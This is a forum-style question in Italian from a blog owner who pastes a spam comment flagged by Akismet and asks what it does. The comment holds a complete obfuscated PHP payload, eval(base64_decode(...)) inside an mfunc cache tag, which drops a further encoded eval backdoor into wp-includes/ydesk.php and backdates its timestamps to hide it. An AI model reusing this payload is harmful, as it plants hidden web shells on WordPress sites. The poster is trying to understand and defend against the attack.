Recentemente Akismet mi ha chiesto di moderare un possibile commento spam sul mio blog.
Era:
<!--mfunc eval(base64_decode("ICRmaWxlID0gZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pIC4gJy8nIC4gJ3dwLWluY2x1ZGVzL3lkZXNrLnBocCc7ICRzcmMgPSAnPD9waHAgZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiRFpaSERxd0lFa1R2MHF2L3hRSW92RWE5d0h0WGVEWXR2UGVlMDA5ZElKWDVGQmtSeFpuMGY2cTNHY3MrMllzL2FiSVZPUHBmWG1SVFh2ejVSNGhqWWQwOGVldGNCRnIwcFFqb0FZekZtSXluVVhQMXR3QkRrTElWcDlrdStjN0d4NWx5RUYrQWZHbDQ2aG1CSjJkSmhkQW9ZY2dvQWNnb0VHQ2Q3MDROQmtaaDNKVDdVUnRmOVVMT1k2M29BTnBHZ0xhRXl4YUlqWXJVb2JMbkZ4clkwSlVCbEt1dFU3dndiQmJxTXBoZkhJSUVDb0tZKzZWdHVjOWZhTGhpWW9hYWlSUVovUHNPeXRKTUNyVXlXQ3lJbE9OckRYM1NQU0FZNkRCYStxZ2RiUTBoZGo5dk81bkVDOHhmV2ZyeDg3VXB2Tjc1WmdjcHNpNW9EVGxPVEtoRFdqVjdLZFFsOEREVWV1T3VMcTRReVViTGF4dnJ4aStqQXRJOGNXYWxOQTNtY0RrM2pVV25hV0VoanhhK0U1dmNRS2Z2dVBlOUNPWUxmZGdLS09KQ3kwWVFlV1lKZ2s4QXk0amxHMTh1UFlScmJFOGtNRnhVbEV5R2lMTU51WnhmQ2VyeW05cmV2VE5DbEw2eDByT2pac1c3Qi9PeHZ1Y1FCaU9QS0FnYXpGSXYwZEprbGIyNXdVSzV5NmF5SlZEMDhVNXVOaGhlNlBLV09oVlF3YWxSUGlCMGUyc2EvYWFtYndHRGM2bWJ4SDZtaUZUdVc4Y3NsRE5pZWhLMURGU0orTXU4bGFiSWZlNXFGeTNQOUFqYkpHb3hNQy8yQjRYbEpoQ3dObmdoOSthNnR5bEhubUFmSU1XTjRCYWdYUjJQcjNzSnJGUWQrUGU2ZHZYTE0wVVJBWElPMFR5ckl4MzJFYzFLUjJTaFVBQkdzbDFQS3hvNEh3dGNUYUdQK1IybWFHbnIrT05PaTdOQ0JhY1dYNkp3SkxYSEJCNXdtR05nMkswOHVIdjc0Sk9qUkRRL2RNbmpyZWVncCtLUmNBMmk5bmlreEVFNmxKYXk1WTBiSjdYTTdzSHNTSFg2OExiemVnbFdxeUxQS1NxTHpjUTR3VnFuS1FJRE91UndUZHZUTENPc2dhaENLZDdPOGtkbmVpU1pBcmt1aElETkN0S25Vc1FvU1NqMklxZXQxR0R3M3ExOHZHQ1pOQW1yU1Q5WUY0cVVwcHEwbEZWRGZRenV0em1PZEFwWDlLN09JcXJMQ09temkvUjlkVGpaWEtQSy9JNkN0SWlSVjhFL3B4NDJSNTFTYVJMSFpaUjVLVEdzbG5IcEdlVFJLeEpVR0U3TFBEWnhpeFlOb2lYcTJPc00yWmlkaVZWZ0hob29mclV6WXZRRDFzQ0J0OGdCWVFoOG9KWEt5d0h0VHd4cjJMTHE4dFM4bXhDQ014TmgyRm12WTJKMTBkYjBwV20wT2NPRkg0bjlNN0JHWHNVYXQ3VjR1QWlaVnZjeVpsNFIwaG9EQWNUbWlJZTFPVDl0dnNxcEswZ2dnSFNWSXhTSEhTalpmTzlDUXJycVJqOUgyYVg2NEFseWpENXgwZ0wyaUVBc1J6enJMVS9mYnE3ODM1bGExRlRjWUVZdzhrbUEyRmI4cWFla1dHTjdkMlJjeWExOGNzTW1scStPbFFCcE5DRkt5VGlmc0NHYVNlMzAxQ0M2VDJ6WWN2VVVHaFFUUFBsRm9TZFhxMDk3WE1MbktTVkxjNUJNK0wzQzhueGgvcFhLQ2YrQXhhaC9wbys3ZDRRUDJUNjlHeUxMa1lhUzhNUXhCK1QrazBmQ3J3d2VuVzJoZzdndGpOR2NnOFpIbmVWdmZvTm4vS1FMZVhnQ2RIeEdXa294bjFwcFRGZjFWUEdSRFF0ME5YVUEwb3FQaFJTZkpPT2lPWko0SkF6QWRzNnBHY3RnRWU2NkI1L2lqcUFEZVd2TGpIdWExeW53R1ZkRW8rbW1jYUFPU0pja1VqRUxJR1pPR24xMkNtc0ljVVVZVnVqSmF1MWx5Mk9ic3RseFA0M1dTUC81dUttUVdGRGswcG5WRTZkWWllbTVlb3kyaTZjSDlZUjdLMVpiMVdZTjFuUllpUjYxUXl6NVVXTm1VUXN5dThLV1FzUHdYK2I2VFUvVktBcFhmR0YxNzFYVUdpKzB2TTBPWmxqdkExUXFpKzE1cmY3eUllVFZyR1NYWjN0ZS9vZDJtOFJUNk5Cd2loejQ4RlpPVjN2Z2pMcDRLMkpxMGgxQW9Qd2IyOUVFV0h1V0cwVnExQzY1cTBRb1p2ZlI2Tm8yU1ljQklFcEFXZWppODRyNHRDdFI5cVpzamkyRXY1YVpYQVBRbGJlQ29FMEhjTCt0OUJJVnc2WmUzWlprc29aUWg2QzM0RTlZVVpxQXdBazQ1MW9NREIwcmRsQXRSWG9vcnhvR2RIUERHUTJYNWhFMmE1c2tjVkdNTHc3ZTRybngxTS9XZjRXdnZTZTA0VVFtNGpsMVJxVnNjSkpWdzQ3Q1FtR1RBdmc4cUhublRQSmVFWjgrQTk0eGxkNkZBZnhXUTRKY1dnL01oVWRQc2xPaTNxbnoycEljbU00NldTeEpPUHpoY2pzQVp6Ri9NNGxXOUc4MXlFTVRMZmlaaUNpejYwY3NNdHBYRmV1SCtMeUNVdHdYZVlrVkc5dStSMHI2Wm5GMjYzVm50WC9WVFFETTFndnY2cDFid3VBSUgwaUtoZmQrU0tXRDFZME5lWWlTNnBzNkJRb1FucEc3d1JQZ3c2cVdCS0JPZWRxdWFOVHRrMkYzRWRteWYwVzJ1bkw3UjBKRG9OakZZbmdTeDlybmtNa25vNkZyZEF3ZVpDYTJZZlNIS29BUzFvT0huZ1dUN2xpZ2NvZ2grR0lQb2JKS3FHZ1hmN2NEeTNIRnVDNGNidFZFOC9RSlhpTEZ6RVY4bEh1WVdlYlo2dWlqZ1hUNFE1bk8xMStzWHp3anlsVllMYUFCSnNvbEtKVEZVQlUza0Fxb3hrYmlkS2RsNVVNSkdWb2VtVVNzWkdLa0JCWDYvU1ZoMmVleXNubG9qTHR2NWhoSEtYRmJ6K3dDZzZZMmI4VHdsdFEzTkZmMkNtRWxtand4MXlhZ1lvN2IwVmhIOHZRRERxUUpSWnArU0U5ektBdGNsNll6Vkt5NFVMa2pweU5NMkhXK09HUTVJOGdOUWRKYUI1NVg1ZEtPM3d5WTNkK2VVZXZrVlNYQTl5K2NHWStXaW9CTnpGUHlBVktscnZOemx4dW5IekxQSnhmdHhISkpJd1hZZkpybnpSY1JFNFcxdVNhZDNvdlI3SnVIN2RnN2F6ZUJRWFF0ZnJtMmpXZVZMVW1TazNuUXovR1pjU3cxeE5IQzRoMHRYU29Za21XK3ZMWmxTRXBkbFRaU3RObGNZY2RUR2hpY0J2T2dGY1BEcWNFcTdvOXZuc20vbGlGZEtuQ0VNOERJOFdYaFV0d0lMb0tGUkc4NVF0Wjlodm9ISkRmRG1MYmIyekV3NFpabzdUWlRxckkwZEdZNUJKWVBXdE9jNVZnQlpwbXNnUDhaUlpocjZOc2xSdWhjbk03bW9nS3JkWnFOSWY3K1VMeDZzNVY2Q3oxSlJLWGx1eWZSMWdaZGN0QSswZ041M2RrZndSQ01uNXpBM3NzUzlOY3NiamFLKy9iR2VmdGtlQnhiY0VBTVVrNlk4Njg3WVdQYjh2NGxTWlVjdUx0blJEY2lqT1BIZitSNlBrODFjOG1LWEVQSWdKa3F3b2o1NklpZkNhYktlUS9Ed3R4NThIeklNbitHbS82aXhLa0NGeEdqd1FXR0ZndGhmc08wcnZSaW1xMTRMNEFQNG9OVW00MkUvdWlNQ2J5eXUxdHhPU3hadFh3U05Udk1PMWQxSnV6Q0hzVmRqd3I1MzRlazBERlNTZVFYa21OVk1oTE5NQjFycjc5S0NKSUFBSUlnVVlLWC91OC9mLy8rL2QvL0FRPT0iKSkpOyA/Pic7ICRtdGltZSA9IGZpbGVtdGltZShkaXJuYW1lKCRmaWxlKSk7ICRmaCA9IGZvcGVuKCRmaWxlLCAndycpOyBmd3JpdGUoJGZoLCAkc3JjKTsgZmNsb3NlKCRmaCk7IEB0b3VjaCgkZmlsZSwgJG10aW1lLCAkbXRpbWUpOyBAdG91Y2goZGlybmFtZSgkZmlsZSksICRtdGltZSwgJG10aW1lKTsgCg==")); --><!--/mfunc-->
Questo decodifica fino a
$file = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . 'wp-includes/ydesk.php';
$src = '';
$mtime = filemtime(dirname($file));
$fh = fopen($file, 'w'); fwrite($fh, $src);
fclose($fh);
@touch($file, $mtime, $mtime);
@touch(dirname($file), $mtime, $mtime);
Ora non riesco a vedere cosa sta tentando di fare l'hacker qui. Qualcuno potrebbe spiegare cosa sta succedendo? Uno script ydesk.php
non esiste.